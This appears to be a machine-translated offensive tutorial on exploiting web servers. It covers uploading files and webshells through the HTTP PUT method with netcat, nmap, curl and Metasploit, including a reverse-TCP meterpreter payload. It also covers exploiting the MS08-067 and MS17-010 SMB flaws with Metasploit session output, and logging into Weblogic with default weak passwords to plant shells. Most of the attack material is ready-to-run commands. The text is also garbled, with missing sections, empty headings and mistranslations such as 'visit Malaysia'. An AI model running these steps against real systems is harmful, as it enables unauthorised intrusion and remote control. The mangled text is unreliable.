1. Utilization of HTTP PUT method
PUT is a method used for file management. If the operation and maintenance personnel have not modified the default configuration of the web server and still support these methods, they can Upload files to the server file system at will.
1.1. Netcat uses the PUT method
Netcat is a very famous network tool, referred to as "NC", and is known as the "Swiss **" in penetration testing say. It can implement multiple functions such as port monitoring, port scanning, remote file transfer, and remote shell.
After checking that the Web service has enabled the PUT method, enter the following command to upload the file:
nc IP PORT
PUT /dav/hack.txt HTTP/1.1
Host: IP
Press Enter twice to see that the hacked.txt file has been successfully created, the status code is 201, and the file creation location is the /dav/ directory.
1.2. Nmap uses the PUT method
Command:
nmap -p port IP -script http-put-script-args http-put. url='/dav/test.php',http-put.file='/root/test.php'
Command explanation:
-script http-put //Select http- put script, the script supports uploading files using the http put method.
-script-args //Set script parameters 1 and 2
http-put.url='/dav/test.php' //Set parameter 1 as the upload target file path
http-put.file='/root/test.php' //Set parameter 2 to the upload local file path.
You can see in the picture that the upload through the Nmap script was successful.
Use the daily BurpSuite to access the upload target path to capture the data packet, modify the data packet request method and upload path, write the file content in the request body, and send the package to the web server.
The server response packet shows that the file was created successfully.
CURL is a file transfer tool that uses URL syntax to work under the command line, uploading or downloading through the specified URL data and display the data. The c in curl means client, and URL is the URL.
The command to create a file through the PUT method is as follows:
Command 1:
curl -i -XPUT -H “Content-Type: text/plain ; charset=utf-8” -d “hack completed” http://192.168.40.4/dav/hack.php
##Command explanation: -i/--include //Include protocol header information when output -X/--requestCommand 2:
curl -i -X PUT -H "Content-Type:application /xml; charset=utf-8″ -d @”F:\1.php” http://192.168.40.4/dav/hack.php Command explanation :-d @"filename" //Read content from the file
##1.5 QuickPuT script uses the PUT method
Using QuickPut, a Python command line tool, we can upload files to the server using the HTTP PUT method.
Upload command:
python2 QuickPut.py F:\1.php http://192.168.40.4/dav/hack1.php
Command explanation:
python QuickPut.py
1.6 Metasploit uses the PUT method
Command:
Use http_put module for auxiliary scanning http service
show options //Display module parameters
set RHOSTS 192.168.40.4 //Set the target IP
set PATH /dav/ //Set the target path
set payload php/meterpreter/reverse_tcp //Set attack payload
set filename msf.php //Set upload file name
set FILEDATA file ://root/test.php //Set the data path for uploading local files
exploit //Start the attack
The return result shows that the file was successfully uploaded.
After conducting information collection port scanning, it is found that the host has ports 139 and 445 open and the banner displays Microsoft Windows, which will be associated with 139 and 445 ports. Port 445 SMB vulnerabilities, the more common ones include ms17-010, ms08-067, etc.
Vulnerability Detection
Command:
namp --script=/usr/share/nmap/scripts/smb- vuln-ms08-067.nse –sTIP
namp --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIP
Command Explanation:
--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //Use Nmapms08-067 vulnerability scanning script
-sT //Use TCP scanning
If the output result is:
smb-vuln-ms08-067:
VULNERABLE:
Microsoft Windows system vulnerable toremote code execution (MS08-067)
State: VULNERABLE
IDs: CVE: CVE-2008-4250
The Server service inMicrosoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,Vista Goldand SP1, Server 2008, and 7 Pre-Beta allows remote attackers to executearbitrarycode via a crafted RPC request that triggers the overflow during pathcanonicalization.
Disclosure date: 2008-10-23
References:
https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
https://cve.mitre.org /cgi-bin/cvename.cgi?name=CVE-2008-4250
indicates that the ms08-067 vulnerability exists, and ms17-010 is the same as above.
Exploiting the vulnerability
Use the MSF smb attack module to exploit the ms08-067 and ms17-010 vulnerabilities.
msf> use exploit/windows/smb/ms08_067_netapi
msfexploit(ms08_067_netapi) > set RHOST IP
msfexploit(ms08_067_netapi) > exploit
[*]Started reverse TCP handler on Local listening IP port
is automatically detecting the target IP: 445
[*]Target IP: 445- Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*]Target IP:445- Selected Target: Windows 2000 Universal
[*]Target IP:445- Attempting to trigger the vulnerability...
[*]Sending stage (957487 bytes) to target IP
[*]Meterpreter session 2 opened (monitoring IP port-> target port bounce)
meterpreter>
ms17-010 exploit same as above.
In penetration testing, we often encounter Weblogic Server application servers. After seeing Weblogic Server, we think that Weblogic Server may have background management. Weak passwords, JAVA deserialization vulnerabilities, arbitrary file upload vulnerabilities, and many other CVE vulnerabilities in this version. Let’s share how to exploit various vulnerabilities in Weblogic.
3.1 Backend login weak password
Common Weblogic Server login weak password:
weblogic/weblogic
weblogic/weblogic1
weblogic/weblogic10
weblogic/weblogic123
If it exists, you can log in to the application server management background and upload the webshellwar package.
Deploy the war package in the application server after uploading
After successfully uploading and deploying the war package, you can visit Malaysia.
##3.2 JAVADeserialization Vulnerability
3.3 Weblogic Arbitrary file upload vulnerability
Return information by blasting Weblogic.
Obtain the login password, service name, and random character directory, and construct and upload the POC to upload the test file.
Pass in the following data under the /bea_wls_deployment_internal/DeploymentService path
The server returns the upload success and the absolute path of the file.
Display the content of the uploaded file after accessing this uploaded file path
http://IP/bea_wls_deployment_internal/shell.jsp
The above is the detailed content of Example Analysis of Web Vulnerability Exploitation Postures. For more information, please follow other related articles on the PHP Chinese website!